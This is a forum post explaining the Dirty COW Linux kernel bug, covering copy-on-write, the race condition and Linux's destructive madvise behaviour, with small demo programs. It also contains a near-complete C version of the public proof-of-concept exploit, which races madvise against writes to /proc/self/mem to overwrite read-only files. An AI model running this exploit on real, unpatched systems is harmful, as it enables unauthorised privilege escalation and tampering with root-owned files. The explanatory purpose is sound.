Another more thorough but less technical explanation is here.

So this was borderline over my head, but I think I understand it well enough to get the basics.

The Dirty Cow bug, as it's known, allows privilege escalation on Linux (meaning an untrusted program can modify files owned by root). "Cow" technically refers to COW, for copy-on-write, which is a way to avoid keeping multiple copies of the same memory around. What happens is that if multiple processes want a given bit of data, the system gives them all a view of one read-only instance of the memory rather than making each of them a separate copy. Then if one of them needs to write to it, the kernel creates a copy that is writable and visible only to that process. The "dirty" means that a page of memory has been modified, so it no longer matches what's on disk.
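You can actually see COW from user space with an ordinary mmap call: mapping a file with MAP_PRIVATE asks for exactly this behavior, where a write only ever changes your process's private copy and never the file itself. A minimal sketch (the file path is just an example; any file you can read will do):

```c
/* Sketch: a private (copy-on-write) mapping of a file we can only read. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/etc/hostname", O_RDONLY);   /* example path */
    struct stat st;
    if (fd < 0 || fstat(fd, &st) != 0) { perror("open/fstat"); return 1; }

    /* MAP_PRIVATE asks for copy-on-write: the pages are shared read-only
     * until we write, at which point the kernel gives us our own copy
     * and the file on disk is left untouched. */
    char *map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 1; }

    map[0] = 'X';   /* triggers the COW: only our private copy changes */
    printf("in-memory copy now starts with: %c\n", map[0]);

    munmap(map, st.st_size);
    close(fd);
    return 0;
}
```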

If I'm understanding the exploit correctly, it races two threads against each other. One thread keeps trying to write to a read-only, copy-on-write mapping of a root-owned file (the proof of concept does this through /proc/self/mem, which is allowed to write to such a mapping because the result is supposed to land in a private copy). To handle that write, the kernel makes the COW copy and then retries the access with the "I want write access to this memory" flag removed, since keeping the flag set would otherwise turn the routine into an infinite loop. Once the flag is gone, some security is lessened, because the retried operation is now seen as read-only (and thus less dangerous). Meanwhile, the second thread keeps telling the kernel that the memory is no longer needed, which throws away the freshly made copy. If the timing works out, the retried write lands on the original page, the one backing the file itself, and the change goes through to the actual file.
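To make that structure concrete, here's a rough sketch modeled on the public proof of concept (the underlying kernel bug was patched back in 2016; the target path and message here are placeholders passed on the command line, and the loop count is just "try a lot"): one thread hammers the "I don't need this memory" call while the other keeps writing through /proc/self/mem.

```c
/* Structural sketch of the race described above (roughly the shape of the
 * public proof of concept; the kernel bug it relied on was fixed in 2016). */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void  *map;      /* read-only, private (COW) mapping of the target file */
static size_t map_len;

/* Thread 1: keep telling the kernel the mapping is "not needed", which on
 * Linux immediately throws away the freshly made COW copy. */
static void *madvise_thread(void *arg)
{
    (void)arg;
    for (int i = 0; i < 100000000; i++)
        madvise(map, map_len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: keep writing to the same addresses via /proc/self/mem, the
 * kernel path that makes the COW copy and then retries with the write
 * flag dropped. */
static void *write_thread(void *arg)
{
    const char *msg = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 100000000; i++) {
        lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
        write(fd, msg, strlen(msg));
    }
    close(fd);
    return NULL;
}

int main(int argc, char *argv[])
{
    if (argc < 3)   /* argv[1]: readable target file, argv[2]: text to write */
        return 1;

    int fd = open(argv[1], O_RDONLY);
    struct stat st;
    if (fd < 0 || fstat(fd, &st) != 0)
        return 1;

    map_len = st.st_size;
    map = mmap(NULL, map_len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED)
        return 1;

    pthread_t t1, t2;
    pthread_create(&t1, NULL, madvise_thread, NULL);
    pthread_create(&t2, NULL, write_thread, argv[2]);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

(Compile with -pthread. On any kernel patched since late 2016 the writes simply land in the private copy and the file stays untouched.)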

There are a couple of interesting things about this. One is that the vulnerability has been known since probably 2007. But increases in hardware speed make it much easier to win the race; the proof-of-concept exploit tries each operation 100,000,000 times in order for the proverbial lightning to strike. One contributor (quoted in the YouTube video I linked above) apparently tried to fix it years ago, but it broke something on an IBM mainframe set-up, so the fix was reverted.

The other thing that was kind of interesting is that this also relies on Linux's screwy implementation of madvise. Under the POSIX standard (which spells the advisory version posix_madvise), it's supposed to do what it sounds like: advise the operating system about how a program expects to use certain ranges of memory.

One of the advice values you can set for a given range of memory is MADV_DONTNEED. This is fairly self-explanatory: it tells the OS that the memory is unlikely to be needed in the near future, but the nature of the madvise routine is that it doesn't force the OS to do anything about it. In other words, it tells the OS that it may re-purpose the memory for something else, but doesn't have to.
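Used that way it's purely a hint. A minimal sketch of how a program might use it (the helper name is made up, and buf/len are assumed to describe a mapping the program is done with for now):

```c
#include <stddef.h>
#include <sys/mman.h>

/* Hypothetical helper: hint that we're done with a buffer for a while.
 * On a strictly advisory implementation the kernel may reclaim the pages
 * or ignore the hint entirely; the program works correctly either way. */
void done_with_buffer(void *buf, size_t len)
{
    madvise(buf, len, MADV_DONTNEED);
}
```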

Or at least that's how it's supposed to work. For some reason, when this call was brought into Linux, the "advice" part was thrown out. In Linux, the flag forces the OS to discard the underlying data immediately. If you then try to reference that memory again, the system will either re-read the contents from the file on disk (for file-backed mappings) or hand back all 0's (for anonymous memory with no file behind it). It's unclear why this was done, and from this rant on the subject it appears that it was simply a misreading of how madvise worked in Tru64, an old 64-bit UNIX implementation.
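Here's a tiny demonstration of that Linux behavior using anonymous memory: write something into a page, "advise" the kernel you don't need it, and the data comes straight back as zeros.

```c
#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) { perror("mmap"); return 1; }

    p[0] = 'A';
    printf("before madvise: %d\n", p[0]);   /* 65 ('A') */

    /* On a strictly advisory implementation this could be a no-op;
     * on Linux the page is discarded on the spot. */
    madvise(p, 4096, MADV_DONTNEED);

    printf("after madvise:  %d\n", p[0]);   /* 0 -- the data is simply gone */

    munmap(p, 4096);
    return 0;
}
```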

I hope this makes sense, and some of the more tech-savvy folks (Devac, mk, others) can hopefully tell me if I'm misstating anything.

